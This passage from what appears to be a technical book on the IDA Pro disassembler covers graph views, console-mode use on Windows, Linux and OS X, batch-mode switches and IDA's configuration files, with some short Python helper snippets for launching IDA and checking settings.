within a group to their original form; it does not change the fact that the

node or nodes now belong to a group. When a group is uncollapsed, the two

new buttons just mentioned are removed and replaced with a single Collapse

Group button. An expanded group can easily be collapsed again using the

Collapse Group button or by right-clicking the title bar of any node in the

group and selecting Hide Group. To completely remove a grouping applied

to one or more nodes, you must right-click the title bar of the collapsed node

or one of the participating uncollapsed nodes and select Ungroup Nodes.

This action has the side effect of expanding the group if it was collapsed at

the time.

Summary

Graphs are a powerful tool available to assist you in analyzing any binary. If

you are accustomed to viewing disassemblies in pure text format, it may take

some time to adjust to using a graph-based display. In IDA, it is generally a

matter of realizing that all of the information that was available in the text

display remains available in the graph display; however, it may be formatted

somewhat differently. Cross-references, for example, become the edges that

connect the basic blocks in a graph display.

Choosing the proper graph to view plays an important role in optimizing

the use of graphs for analysis. If you want to know how a particular function is

reached, then you are probably interested in a function call or cross-reference

graph. If you want to know how a specific instruction is reached, then you are

probably more interested in a control flow graph.

Some of the frustration that users have experienced in the past with

IDA’s graphing capabilities is directly attributable to the inflexibility of

the wingraph32 application and its related graphs. These frustrations were

addressed in part with the introduction of an integrated graph-based disas-

sembly mode. IDA is primarily a disassembler, however, and graph genera-

tion is not its primary purpose. Readers interested in dedicated graph-based

analysis tools may wish to investigate applications designed specifically for

that purpose, such as BinNavi,11 produced by Halvar Flake’s company

Zynamics.12

11. See http://www.zynamics.com/binnavi.html.

12. Note that Zynamics was acquired by Google in March 2011.

THE MANY FACES OF IDA

For many years, the Windows GUI version

was the superstar in the IDA stable. Since

the release of IDA version 6.0 this is no

longer the case, as Linux and OS X users can

now enjoy GUI versions of IDA for their platforms.

However, this new version in no way changes the fact

that there are several alternative ways to use IDA. The

original version of IDA was actually an MS-DOS console application, and the

console version remains available on all platforms to this day. With built-in

remote debugging capabilities, IDA is a powerful multiplatform analysis and

debugging tool.

Beyond its interactive capabilities, IDA offers a batch-processing mode in

all of its versions to facilitate automated processing of large numbers of files.

The key to effective batch processing with IDA is to understand what each

version can and cannot do and choose the appropriate version of IDA to suit

your requirements. In this chapter we discuss IDA’s console version and how

to make the most of IDA’s batch-processing facilities.

Console Mode IDA

The heart of all console versions of IDA is a Borland-developed, console I/O

library called TVision that has been ported to several platforms, including

Windows, Linux, and Mac OS X, among others. Hex-Rays makes the source

code for its current TVision port available to paying IDA customers on its

IDA download page.1

The use of a common library across all platforms keeps the user interface

consistent on all of the console versions. There are a few annoyances to deal

with in moving from platform to platform, however, such as varying degrees

of support for the mouse, resizing, and the ability to pass hotkeys to the IDA

application. We discuss some of the problems and, when available,

workarounds in the platform-specific sections that follow.

Common Features of Console Mode

As the term console mode implies, the text-based versions of IDA all run within

a terminal or shell of some sort. These consoles may have varying degrees of

support for resizing and the use of a mouse, resulting in limitations that you

will need to learn to live with. The types of limitations depend on which plat-

form and terminal program you are using.

The console user interface consists of a menu bar across the top line of

the display to show menu options and status and a common operations bar

across the bottom line of the display that’s similar to a text-based toolbar.

Available operations are activated using hotkeys or, when supported, by click-

ing the mouse. Virtually every command available in the GUI version is avail-

able in some form in the console version, and most of the hotkey associations

are preserved as well.

The IDA display windows consume the space between the upper menu

bar and the lower command bar. However, a common limitation, regardless

of which terminal program you happen to use, is that there is little display

room when the screen is limited to roughly 80 by 25 characters and no

graphics. Therefore, console versions of IDA typically open only two display

windows by default: the disassembly window and the messages window. In

order to approximate the tabbed display windows found in the GUI version,

IDA uses the TVision library’s overlapping windowing capability for text win-

dows and assigns the F6 key (in lieu of window title tabs) to cycle through

available open windows. Each window is numbered sequentially, and the win-

dow ID is present in the upper left-hand corner.

When mouse support is available in your console, it is possible to resize

an IDA display window by clicking and dragging the lower right corner of the

display window to the desired size. To reposition a display window, you click

and drag the display’s top border. Lacking mouse support, you can move and

resize individual displays via Window▸Resize/Move (CTRL-F5) and then use

your arrow keys to move and SHIFT-arrow keys to resize the active window.

If your terminal program can be resized using the mouse, IDA recognizes the

new terminal size and expands (or shrinks) to fill it as appropriate.

1. See http://www.hex-rays.com/idapro/idadown.htm.

Without graphics capability, the integrated graph-based disassembly

mode is not available, and no control-flow arrows are displayed in the left

margin of the disassembly listing window. However, all subviews available in

the GUI version are available in the console versions. As in the GUI version,

the majority of subviews are accessible via the View▸Open Subviews menu.

The one major difference in available displays is that hex dumps are not

available as a unique subview. Instead, you can toggle a disassembly to a hex

dump and back using Options▸Dump/Normal View (CTRL-F4). In order to

have both a disassembly and a hex view open simultaneously, you must open

a second disassembly window (View▸Open Subviews▸Disassembly) and tog-

gle the new view to a hex dump. Unfortunately, there is no way to synchro-

nize the new hex dump to the existing disassembly view.

With mouse support, navigating your way around the disassembly remains

much the same as the GUI version, where double-clicking any name takes

you to the corresponding address. Alternatively, positioning the cursor on a

name and pressing ENTER causes the display to jump to the corresponding

named location (this also happens to work in the GUI version). Pressing

ENTER while the cursor is positioned on the name of a stack variable opens

the detailed stack frame view for the associated function. Without mouse sup-

port, the menus work similarly to many other console applications, employ-

ing the ALT-x method of menu navigation, where x is a highlighted character

on the current screen.

Windows Console Specifics

The Windows cmd.exe (command.com on the Windows 9x family) terminal is not

terribly flexible, but it is fairly well supported by IDA’s console version. The

Windows console version of IDA is named idaw.exe, while the GUI version

is named idag.exe. The corresponding versions for 64-bit binaries (available

with the advanced version of IDA) are named idaw64.exe and idag64.exe,

respectively.

In order for IDA’s mouse support to work in Windows, you must ensure

that QuickEdit mode is disabled for the terminal in which you are running

IDA. To configure QuickEdit mode as one of the terminal’s properties, right-

click the terminal’s title bar and select Properties; then deselect QuickEdit

mode on the Options tab. You must do this prior to launching IDA, as the

change will not be recognized while IDA is running.

Unlike Linux terminals running under X Windows, cmd.exe cannot be

expanded by using the mouse to enlarge the window. On Windows only,

IDA’s console version offers the Window▸Set Video Mode menu option

to resize cmd.exe to one of six fixed terminal sizes, up to a maximum of 255

by 100.

While no graph mode is available in the disassembly window, IDA’s

external graphing options are available. Selections from the View▸Graphs

menu will cause IDA to launch the configured graph viewer (such as

qwingraph) to display the resulting graph. For Windows versions of IDA, it

is possible to open several graphs at once and continue to use IDA while

the graphs are open.

Linux Console Specifics

The Linux console version of IDA is named idal (or idal64 for analyzing

64-bit binaries). Prior to IDA 6.0, Linux and OS X console versions were

included as standard components of your IDA distribution. As such, when

you copy these console versions to your Linux or OS X platform, you must

also copy your IDA key file (ida.key) so that your console version will run

properly. Note that this requires that you install IDA on a Windows machine

at least once, even if you never intend to run the Windows version. On Unix-

style systems you may alternatively copy your key file to $HOME/.idapro/

ida.key. If you do not create it, IDA automatically creates the IDA personal

settings directory ($HOME/.idapro) the first time you launch IDA.

IDA 6.x installations are much simpler. Because IDA 6.x is purchased for

a specific platform, the installation procedure on your platform takes care of

installing the GUI version, the console version, and your IDA key file to suit-

able locations.

Basic navigation in the Linux version is similar to navigation in the Win-

dows console version; several Linux specifics are addressed in this section.

Users’ tastes for Linux terminal programs are as varied as their tastes for

Linux distributions in general. IDA includes a file named tvtuning.txt that

offers some details on how to configure various terminal types, including

remote Windows terminal clients such as SecureCRT and PuTTY.

One of the biggest challenges that you will face when using Linux termi-

nal programs is making sure that your hotkey sequences are passed all the

way to IDA and not captured by the terminal program itself. For example,

will ALT-F open IDA’s File menu or your console’s File menu? The two

options for dealing with this problem are to find a terminal program whose

hotkey sequences don’t overlap IDA’s (or that can be configured not to over-

lap) or to edit IDA’s configuration file to remap commands to hotkeys that

are not used by your terminal. If you choose to remap the hotkeys, you may

want to update the hotkey mappings on every computer on which you use

IDA so that you don’t have to remember which mapping is in effect at each

location. You may also find it difficult to interact with other IDA users who

are using the default mappings.

If you choose to use the standard Linux text display, the dimensions of

your IDA console will be fixed, and your mouse support will be dependent

on your use of GPM (the Linux console mouse server). If you are not using

GPM for mouse support, you should specify the noGPM option for TVision

when you launch IDA, as shown here:

# TVOPT=noGPM ./idal [file to disassemble]

Color choices are quite limited in console mode, and you may need to

adjust your color settings (Options▸Colors) to ensure that all text is visible

and does not blend into the background. Four predefined color palettes are

available, with the option to customize the colors (a choice of 16) used for

various parts of the disassembly.

If you are running X, then you may be running KDE’s konsole, Gnome’s

gnome-terminal, a straight xterm, or some other variation on a terminal. Other

than xterm, most terminals offer their own menus and associated hotkeys that

may or may not overlap IDA’s hotkey assignments. Consequently, xterm is not

a bad choice for running IDA, although it is not necessarily the most visually

appealing. KDE’s konsole is our preferred Linux console as it offers the best

appearance, fewest hotkey collisions, and smoothest mouse performance.

In order to address some of the problems surrounding keyboard and

mouse use within various X Windows consoles, Jeremy Cooper developed a

native X11 port2 of the TVision libraries. Using this modified version of TVi-

sion allows you to launch IDA in its own X window rather than consume an

entire console. Compiling Cooper’s TVision port yields a drop-in replacement

for libtvision.so, the shared TVision library used by idal. After installing

the new library, you may receive an error message stating that a VGA font

can’t be loaded when you attempt to run IDA. If this happens, you will need

to install a VGA font and let your X server know where to find it. A suitable

VGA font is available at http://gilesorr.com/bashprompt/xfonts/ (download both

vga and sabvga). Another interesting feature of using the native X11 port is

that you can forward the X11 window to another machine. Thus, you can run

IDA on Linux but forward the X11 window (over ssh of course) to a Mac.

For remote access to your Linux-based IDA installation using the Hex-

Rays–supplied TVision libraries, we recommend that you configure your ter-

minal software to emulate an xterm (consult tvtuning.txt and your terminal

emulator’s documentation for more information) and then launch IDA

according to the instructions contained in tvtuning.txt. For example, you

must specify TVOPT=xtrack in order for the mouse to work with IDA when

using SecureCRT as your terminal emulator.

You can, of course, choose to export your TVOPT settings, eliminating the

need to specify them every time you launch IDA. For a full overview of avail-

able TVision options, refer to linux.cpp in the TVision source distribution.
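If you launch console IDA from a script rather than a shell, the same effect can be had by setting TVOPT in the child process's environment. The following Python sketch only builds the command and environment; the helper name idal_launch and the file name a.out are assumptions for illustration, and the option value is passed through unchanged.

```python
import os

def idal_launch(binary, tvopt, idal="./idal", environ=None):
    """Build the argv list and environment for launching console IDA."""
    # Copy the environment so the caller's own settings are left untouched.
    env = dict(os.environ if environ is None else environ)
    env["TVOPT"] = tvopt  # for example "noGPM" or "xtrack", as described above
    return [idal, binary], env

argv, env = idal_launch("a.out", "noGPM")
print(argv, env["TVOPT"])
# To actually start IDA you could pass both values to subprocess.call:
#   subprocess.call(argv, env=env)
```

Building the environment separately keeps the setting local to the IDA process, which is the scripted counterpart of prefixing the command with TVOPT=... on the command line.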

External graph views on Linux are available from the console version

only if you happen to be running IDA in a windowing environment, and you

have configured the GRAPH_VISUALIZER variable in ida.cfg to point to a suitable

graph rendering program.3 IDA versions prior to 6.0 are only capable of gen-

erating graphs using GDL. You may install a GDL viewer such as aiSee4 and

configure IDA to launch the new application by editing IDA’s main configu-

ration file, <IDADIR>/cfg/ida.cfg. The configuration option GRAPH_VISUALIZER

specifies the command to be used to view IDA’s GDL graphs (all legacy mode

graphs). The default setting looks something like this:

GRAPH_VISUALIZER = "qwingraph.exe -remove -timelimit 10"

2. See http://simon.baymoo.org/universe/ida/tvision/.

3. Refer to “IDA Graphing” on page 176.

4. The GDL viewer aiSee is available for many platforms and is free for noncommercial use. It

can be found at http://www.aisee.de/.

The remove option asks qwingraph to delete the input file, which is useful

when you are displaying temporary files. The timelimit option specifies the

number of seconds to spend attempting to generate a pretty graph. If the

graph cannot be laid out neatly within this time, qwingraph switches to a “fast

and ugly”5 layout algorithm. Beginning with IDA 6.0, the GRAPH_VISUALIZER

option is enclosed in a conditional block to provide separate settings for Win-

dows and non-Windows platforms. If you are editing ida.cfg on a non-Windows

platform, make sure that you are editing the correct portion of the file.

If you have installed a GDL viewer such as aiSee, then you need to edit

GRAPH_VISUALIZER to point to your viewer of choice. For a typical installation

of aiSee, this might result in the following:

GRAPH_VISUALIZER = "/usr/local/bin/aisee"

Note that it is always best to specify the full path to your GDL viewer

to ensure that it is found when IDA attempts to launch it. Finally, since

qwingraph is open source software, users of older versions of IDA are free

to download the source for qwingraph from Hex-Rays (see Chapter 9), build

it, and integrate qwingraph into their IDA installations.
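Because IDA 6.0 and later may contain more than one GRAPH_VISUALIZER assignment, it can help to list every active assignment before editing. The Python sketch below does that for a block of configuration text. The helper name and the sample text are invented for illustration (the sample is not a verbatim copy of ida.cfg), and the sketch assumes that inactive settings are commented out with a leading //.

```python
import re

# Matches an active assignment such as: GRAPH_VISUALIZER = "command ..."
ASSIGNMENT = re.compile(r'^\s*GRAPH_VISUALIZER\s*=\s*"([^"]*)"')

def graph_visualizer_settings(cfg_text):
    """Return (line number, command) for each active GRAPH_VISUALIZER line."""
    found = []
    for number, line in enumerate(cfg_text.splitlines(), start=1):
        match = ASSIGNMENT.match(line)
        if match:  # lines that start with // do not match and are skipped
            found.append((number, match.group(1)))
    return found

# Sample text for demonstration only.
SAMPLE = '''\
// sample configuration fragment
GRAPH_VISUALIZER = "qwingraph.exe -remove -timelimit 10"
// GRAPH_VISUALIZER = "/usr/local/bin/aisee"
'''

for number, command in graph_visualizer_settings(SAMPLE):
    print(f"line {number}: {command}")
```

On a real installation you would read the text from <IDADIR>/cfg/ida.cfg and then edit the reported line that belongs to your platform's portion of the file.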

OS X Console Specifics

IDA’s console versions for OS X are named the same as the Linux versions

(idal and idal64). As with the Linux and Windows console versions, the OS X

versions rely on the TVision library to support console I/O.

The fact that the Mac keyboard has a different layout than a PC keyboard

presents a few challenges when running the Mac version of IDA, primarily

because the Mac’s OPTION/ALT key does not behave like the PC’s ALT key

where application menus are concerned.

The obvious choice for attempting to run IDA is the Mac’s Terminal

application. When launching IDA using Terminal, be sure to configure the

OPTION key as an ALT key for use within IDA. Doing so allows keyboard access

to IDA ALT key shortcuts, such as all of the main IDA menus (ALT-F for the

File menu, for example). If you don’t select this option, you’ll have to use the

ESC key in lieu of ALT; thus, ESC-F brings up the File menu. Since ESC has back

or close-window functionality in IDA, this approach is not recommended.

Figure 10-1 shows the Terminal Inspector dialog, which is accessed via

Terminal▸Preferences when Terminal is active. Select the Use option key as

meta key checkbox to make the OPTION key behave as an ALT key.

One potential alternative to Terminal is iTERM,6 which allows the ALT

functionality of the OPTION key and enables mouse support as well. Another

terminal that many developers seem to like is the gnome terminal, which has

been ported7 to X11 on OS X. Since this requires the installation of XCODE

and X11, we won’t do more than mention the existence of the port. Using

the default Terminal or iTERM should be sufficient for most users.

5. See timelm.c in the wingraph32 or qwingraph source distribution.

6. See http://iterm.sourceforge.net/.

7. See http://www.macports.org/.


An alternative way to run IDA on OS X is to install X11 (available on

your OS X installation disks as an optional package) and Jeremy Cooper’s

modified TVision library (libtvision.dylib for OS X) to run IDA as a native

X11 application. You may wish to add /usr/X11R6/bin to your system PATH

(edit PATH in /etc/profile) for easier access to X11-related binaries.

Figure 10-1: Mac OS X Terminal keyboard settings dialog

In this configuration, IDA may be launched from an xterm, and it will

execute in its own window with full mouse functionality. The problem with

the OPTION/ALT key will remain, however, as X11 views this key as Mode_switch

and fails to pass the key to IDA. Fortunately, X11 allows you to remap keys

through the use of the xmodmap utility. One solution is to create (or edit) a

file named .Xmodmap in your home directory (something like
/Users/idabook/.Xmodmap) containing the following commands:

clear Mod1

keycode 66 = Alt_L

keycode 69 = Alt_R

add Mod1 = Alt_L

add Mod1 = Alt_R

The default X11 startup script (/etc/X11/xinit/xinitrc) contains commands

to read .Xmodmap whenever you launch X11. If you have created your own

.xinitrc file, which overrides the default xinitrc, you should make sure that it

contains a command such as the following; otherwise your .Xmodmap file will

not be processed.

➊ xmodmap $HOME/.Xmodmap

Finally, you need to modify the default settings for X11 to prevent the
system from overriding your modified key map. Figure 10-2 shows the X11
Preferences dialog.

Figure 10-2: X11 Preferences on OS X

To prevent the system from overriding your keyboard mappings, you
must deselect the middle option: Follow system keyboard layout. Once you
have made this change, restart X11, and your modified keyboard settings
should take effect, making the ALT key available to access IDA’s menus. You
can verify that X11 recognizes the ALT key by using xmodmap to print the
current list of keyboard modifiers, as follows:

idabook:~ idabook$ xmodmap
xmodmap: up to 2 keys per modifier, (keycodes in parentheses):
shift Shift_L (0x40), Shift_R (0x44)
lock Caps_Lock (0x41)
control Control_L (0x43), Control_R (0x46)
➋ mod1 Alt_L (0x42), Alt_R (0x45)
mod2 Meta_L (0x3f)
mod3
mod4
mod5

If mod1 does not list Alt_L and Alt_R, as shown at ➋, then your key map
has not been updated, in which case you should rerun the xmodmap command
listed at ➊ in the previous code.
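The same check can be automated. The following is a minimal Python sketch, not part of IDA or X11, that parses the text printed by xmodmap and reports whether mod1 carries both Alt_L and Alt_R. The function names and the SAMPLE text are our own illustrations, and the parsing assumes the output layout shown in the listing above.

```python
SAMPLE = """xmodmap: up to 2 keys per modifier, (keycodes in parentheses):

shift Shift_L (0x40), Shift_R (0x44)
lock Caps_Lock (0x41)
control Control_L (0x43), Control_R (0x46)
mod1 Alt_L (0x42), Alt_R (0x45)
mod2 Meta_L (0x3f)
mod3
mod4
mod5
"""

def modifier_keys(xmodmap_output):
    """Map each modifier name (shift, lock, mod1, ...) to its list of keysyms."""
    modifiers = {}
    for line in xmodmap_output.splitlines():
        parts = line.split()
        # Skip blank lines and the "xmodmap: up to ..." banner line.
        if not parts or parts[0].endswith(":"):
            continue
        # Tokens such as "(0x42)," are keycodes; keep only the keysym names.
        modifiers[parts[0]] = [p for p in parts[1:] if not p.startswith("(")]
    return modifiers

def alt_is_mapped(xmodmap_output):
    """Return True when mod1 lists both Alt_L and Alt_R."""
    mod1 = modifier_keys(xmodmap_output).get("mod1", [])
    return "Alt_L" in mod1 and "Alt_R" in mod1

print(alt_is_mapped(SAMPLE))
```

To test a live X11 session rather than the sample text, the output of subprocess.run(["xmodmap"], capture_output=True, text=True).stdout can be passed to alt_is_mapped.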

Using IDA’s Batch Mode

All versions of IDA can be executed in batch mode to facilitate automated

processing tasks. The primary purpose of using batch mode is to launch IDA,

have it run a specific IDC script, and have it terminate once the script
completes. Several command-line options are available to control the processing

performed during batch mode execution.

GUI versions of IDA do not require a console in order to execute, mak-

ing them very easy to incorporate into virtually any type of automation script

or wrapper program. When run in batch mode, the GUI versions of IDA do

not display any graphical components. Running the Windows console ver-

sions (idaw.exe and idaw64.exe) generates a full console display that closes

automatically when the batch processing is complete. The console display

can be suppressed by redirecting output to a null device (NUL for cmd.exe,

/dev/null in cygwin), as shown here:

C:\Program Files\Ida>idaw -B some_program.exe > NUL

IDA’s batch mode is controlled by the command-line parameters

listed here:

• The -A option causes IDA to run in autonomous mode, which means that
  no dialogs requiring user interaction will be displayed. (If you have
  never clicked through IDA’s license agreement, then the license
  agreement dialog will be displayed in spite of the presence of this switch.)

• The -c option causes IDA to delete any existing database associated with
  the file specified on the command line and generate an entirely new
  database.

• The -S option is used to specify which IDC script IDA should execute on
  startup. To execute myscript.idc, the syntax is -Smyscript.idc (no space
  between S and the script name). IDA searches for the named script in
  the <IDADIR>/idc directory. If you have IDAPython properly installed,
  you may also specify a Python script here.

• The -B option invokes batch mode and is equivalent to supplying IDA
  with -A -c -Sanalysis.idc at execution. The analysis.idc script that ships
  with IDA simply waits for IDA to analyze the file named on the command
  line before dumping an assembly listing (.asm file) of the disassembly and
  closing IDA in order to save and close the newly generated database.

The -S option is the key to batch mode, as IDA will terminate only if the

designated script causes IDA to terminate. If the script does not shut down

IDA, then all of the options simply combine to automate the IDA startup pro-

cess. Scripting with IDC is discussed in Chapter 15.
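The switches described above are easy to assemble from a wrapper program. The following Python sketch shows one way to do so; batch_command and run_batch are hypothetical helper names of our own, and the executable name passed in (idaw, idal, and so on) is assumed to be on your PATH or given as a full path.

```python
import subprocess

def batch_command(ida_exe, input_file, script=None, new_database=True):
    """Build an argument list for an unattended IDA run."""
    if script is None:
        # -B is shorthand for -A -c -Sanalysis.idc, as described above.
        return [ida_exe, "-B", input_file]
    args = [ida_exe, "-A"]            # autonomous mode: no dialogs
    if new_database:
        args.append("-c")             # discard any existing database
    args.append("-S" + script)        # no space between -S and the script name
    args.append(input_file)
    return args

def run_batch(ida_exe, input_file, script=None):
    """Run IDA and return its exit code; blocks until IDA terminates."""
    return subprocess.run(batch_command(ida_exe, input_file, script)).returncode

print(batch_command("idaw", "some_program.exe", "myscript.idc"))
```

Keep in mind that run_batch returns only if the script named with -S shuts IDA down; otherwise IDA stays open and the call blocks.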

Because of limitations with the TVision library used by the Linux and OS

X versions of IDA, batch execution must be performed within a TTY console.

This makes simple things such as output redirection and background pro-

cessing impossible. Fortunately, the latest version of TVision recognizes the

TVHEADLESS environment variable, which allows console output (stdout) to be

redirected, as shown here:

# TVHEADLESS=1 ./idal -B input_file.exe > /dev/null


Fully detaching from the console for background execution requires the

additional redirection of both stdin and stderr.
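As a rough illustration of full detachment, the following Python sketch sets TVHEADLESS in the child's environment and redirects stdin, stdout, and stderr to the null device. The helper names are our own, and the sketch assumes a TVision build that honors TVHEADLESS as described above.

```python
import os
import subprocess

def headless_popen_kwargs(base_env=None):
    """Keyword arguments for subprocess.Popen that detach IDA from the console."""
    env = dict(os.environ if base_env is None else base_env)
    env["TVHEADLESS"] = "1"               # ask TVision not to require a TTY
    return {
        "env": env,
        "stdin": subprocess.DEVNULL,      # all three standard streams
        "stdout": subprocess.DEVNULL,     # are sent to the null device
        "stderr": subprocess.DEVNULL,
    }

def launch_detached(ida_exe, input_file):
    """Start a batch-mode run in the background and return the Popen object."""
    return subprocess.Popen([ida_exe, "-B", input_file], **headless_popen_kwargs())

print(sorted(headless_popen_kwargs({"PATH": "/bin"})["env"]))
```

Calling wait() on the object returned by launch_detached blocks until that run has finished, which is useful when several files are queued for analysis.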

Ilfak discusses batch mode in one of his blog posts here:
http://hexblog.com/2007/03/on_batch_analysis.html. Among other things, he details how to

move beyond invoking a single script and discusses how to execute an IDA

plug-in from batch mode.

Summary

While GUI versions of IDA remain the most fully featured versions available,

console mode alternatives and batch-processing capabilities offer IDA users

tremendous flexibility in creating complex analysis solutions built around

IDA’s automated analysis capabilities.

At this point we have covered all of IDA’s basic capabilities, and it is time

to move on to more advanced features. Over the course of the next few

chapters we will cover some of IDA’s more useful configuration options and

present some additional utilities designed to improve IDA’s binary analysis

capabilities.

PART III

ADVANCED IDA USAGE


CUSTOMIZING IDA

After spending some time with IDA, you

may have developed some preferred settings

that you wish to use as defaults every time

you open a new database. Some of the options

you have changed may already carry over from session

to session, while other options seem to need resetting

every time you load a new database. In this chapter we examine the various

ways in which you can modify IDA’s behavior through configuration files and

menu-accessible options. We also examine where IDA stores various configura-

tion settings and discuss the difference between database-specific settings

and global settings.

Configuration Files

Much of IDA’s default behavior is governed by settings contained in various

configuration files. For the most part, configuration files are stored in the

<IDADIR>/cfg directory, with one notable exception being the plug-ins
configuration file, which resides at <IDADIR>/plugins/plugins.cfg (plugins.cfg will
be covered in Chapter 17). While you may notice quite a few files in the main

configuration directory, the majority of the files are used by processor mod-

ules and are applicable only when certain CPU types are being analyzed. The

three principal configuration files are ida.cfg, idagui.cfg, and idatui.cfg. Options

that apply to all versions of IDA are generally found in ida.cfg, while idagui.cfg

and idatui.cfg contain options specific to the GUI versions and the text-mode

versions of IDA, respectively.

The Main Configuration File: ida.cfg

IDA’s principal configuration file is ida.cfg. Early in the startup process, this

file is read to assign default processor types for various file extensions and

to tune IDA’s memory usage parameters. Once a processor type has been

specified, the file is then read a second time to process additional configura-

tion options. The options contained in ida.cfg apply to all versions of IDA

regardless of the user interface that is being used.

General options of interest in ida.cfg include memory-tuning parameters

(VPAGESIZE), whether backup files are created (CREATE_BACKUPS), and the name

of the external graph viewer (GRAPH_VISUALIZER).

Occasionally when working with very large input files, IDA may report

that not enough memory is available to create a new database. In such cases,

increasing the VPAGESIZE and then reopening the input file is usually sufficient

to solve the problem.

A large number of options that control the format of disassembly lines

are also contained in ida.cfg, including the default values for many of the

options accessible via OptionsGeneral. These include default values for

the number of opcode bytes to display (OPCODE_BYTES), how far instructions

should be indented (INDENTATION), whether the stack pointer offset should

be displayed with each instruction (SHOW_SP), and the maximum number

of cross-references to be displayed with a disassembly line (SHOW_XREFS).

Additional options control the format of disassembly lines while in graph

mode.

The global option specifying the maximum name length for named

program locations (as opposed to stack variables) is contained in ida.cfg and

is called MAX_NAMES_LENGTH. This option defaults to 15 characters and causes

IDA to generate a warning message any time you enter a name longer than

the current limit. The default length is kept small because some assemblers

cannot handle names longer than 15 characters. If you do not plan to run an

IDA-generated disassembly back through an assembler, then you may safely

increase the limit.

The list of characters allowed in user-assigned names is governed by the

NameChars option. By default this list allows alphanumeric characters and the

four special characters _$?@. If IDA complains about the characters that you

wish to use when you assign new names to locations or stack variables, then

you may want to add additional characters to the NameChars set. For example,

NameChars is the option to modify if you want to make the dot (.) character

legal for use in IDA names. You should avoid the use of the semicolon,
colon, comma, and space characters within names because they may lead to

confusion, as these characters are typically considered delimiters for various

disassembly line parts.
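To see which characters in a proposed name would fall outside the default set, a quick check can be written in a few lines. The following Python sketch models only the default list described above (alphanumerics plus _$?@). It is our own approximation rather than IDA's actual validation logic, and rejected_characters is a hypothetical helper name.

```python
import string

# Default set described above: alphanumerics and the four characters _$?@
DEFAULT_NAME_CHARS = set(string.ascii_letters + string.digits + "_$?@")

def rejected_characters(name, allowed=DEFAULT_NAME_CHARS):
    """Return the characters in name that fall outside the allowed set, in order."""
    seen = []
    for ch in name:
        if ch not in allowed and ch not in seen:
            seen.append(ch)
    return seen

print(rejected_characters("std.vector::push"))
```

Passing DEFAULT_NAME_CHARS | {"."} as the allowed set models the effect of adding the dot character to NameChars.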

The last two options worth mentioning influence IDA’s behavior when

parsing C header files (see Chapter 8). The C_HEADER_PATH option specifies a

list of directories that IDA will search to resolve #include dependencies. By

default, a common directory used by Microsoft’s Visual Studio is listed. If

you use a different compiler or if your C header files are in a nonstandard

location, you should consider editing this option. The C_PREDEFINED_MACROS

option can be used to specify a default list of preprocessor macros that IDA

will incorporate regardless of whether IDA has encountered them while pars-

ing a C header file. This option offers a limited workaround facility for deal-

ing with macros that may be defined in header files to which you do not have

access.

The second half of ida.cfg contains options specific to various processor

modules. The only documentation available for options in this section of the

file comes in the form of the comments (if any) associated with each option.

The processor-specific options specified in ida.cfg generally dictate the

default settings in the Processor options section of IDA’s initial file-loading

dialog.

The last step in processing ida.cfg is to search for a file named
<IDADIR>/cfg/idauser.cfg. If present,1 this file is treated as an extension of ida.cfg, and any

options in the file will override corresponding options in ida.cfg. If you do

not feel comfortable editing ida.cfg, then you should create idauser.cfg and

add to it all of the options that you wish to override. In addition, idauser.cfg

offers the easiest means for transferring your customized options from one

version of IDA to another. For example, with idauser.cfg you do not need to

re-edit ida.cfg each time you upgrade your copy of IDA. Instead, simply copy

your existing idauser.cfg to your new IDA installation any time you upgrade.
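If you maintain several IDA installations, you might generate idauser.cfg from a single list of preferred settings. The following Python sketch renders such a file. It assumes the NAME = value layout with // comments and YES/NO flags used in ida.cfg. render_overrides is a hypothetical helper name, and the option values shown are arbitrary examples rather than recommendations.

```python
def render_overrides(options):
    """Render a dict of option names and values as idauser.cfg text."""
    lines = ["// idauser.cfg: personal overrides for ida.cfg"]
    for name, value in options.items():
        if isinstance(value, bool):       # test bool first: bool is a subclass of int
            text = "YES" if value else "NO"
        elif isinstance(value, int):
            text = str(value)
        else:
            text = '"' + str(value) + '"'  # everything else is written as a quoted string
        lines.append(f"{name} = {text}")
    return "\n".join(lines) + "\n"

print(render_overrides({"OPCODE_BYTES": 8, "MAX_NAMES_LENGTH": 63, "CREATE_BACKUPS": False}))
```

The resulting text can be written to <IDADIR>/cfg/idauser.cfg. Compare the output against the corresponding entries in your own ida.cfg before relying on it, since a syntax error in a configuration file prevents IDA from starting.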

The GUI Configuration File: idagui.cfg

Configuration items specific to the GUI version of IDA are located in their

own file: <IDADIR>/cfg/idagui.cfg. This file is organized into roughly three

sections: default GUI behaviors, keyboard hotkey mappings, and file
extension configuration for the File▸Open dialog. In this section we discuss a few

of the more interesting options. Consult idagui.cfg for the complete list of

available options, which in most cases are accompanied by comments describ-

ing their purpose.

1. This file does not ship with IDA. Users must generate this file on their own if they wish IDA to
find it.

The Windows GUI version of IDA allows a secondary help file to be
specified using the HELPFILE option. Any file specified here does not replace IDA’s
primary help file. The intended purpose of this option is to provide access to
supplemental information that may apply in specific reverse engineering
situations. When a supplemental help file is specified, CTRL-F1 causes IDA to
open the named file and search for a topic that matches the word under the
cursor. If no match is found, then you are taken to the help file’s index. As
an example, unless you count auto comments, IDA does not offer any help

information regarding the instruction mnemonics in a disassembly. If you

are analyzing an x86 binary, you might like to have an x86 instruction refer-

ence available on command. If you can locate a help file that happens to con-

tain topics for each x86 instruction,2 then help for any instruction is only a

hotkey away. The only word of caution concerning supplemental help files

is that IDA supports only the older WinHelp-style help files (.hlp). IDA does

not support the use of compiled HTML help files (.chm) as secondary help

files.

NOTE Microsoft Windows Vista and later do not provide native support for 32-bit WinHelp

files because the WinHlp32.exe file does not ship with these operating systems. Please

refer to Microsoft Knowledge Base article 917607 (see footnote 3) for more information.

A common question asked about using IDA is “How can I patch binaries

using IDA?” In a nutshell, the answer is “You can’t,” but we will put off dis-

cussing the details of this issue until Chapter 14. What you can do with IDA is

patch the database to modify instructions or data in almost any way you see

fit. Once we discuss scripting (Chapter 15), you will understand that modify-

ing the database is not terribly difficult. But what if you are not interested

in or not ready to learn IDA’s scripting language? IDA contains a database-

patching menu that is not shown by default. The DISPLAY_PATCH_SUBMENU option

is used to show or hide IDA’s patching menu, which shows up as Edit▸Patch

Program. The options available on this menu are discussed in Chapter 14.

The single-line input box at the bottom of your IDA workspace is known

as the IDA command line. You can use the DISPLAY_COMMAND_LINE option to
control whether this field is displayed or not. By default the command line
is shown. If you are tight on screen space and you don’t anticipate the need

to enter one-line scripts, then turning this feature off can help you regain a

small amount of room in your IDA display. Note that this command line does

not allow you to execute operating system commands as if you were entering

them at a command prompt.

The hotkey configuration section of idagui.cfg is used to specify mappings

between IDA actions and hotkey sequences. Hotkey reassignment is useful

in many instances, including making additional commands available via hot-

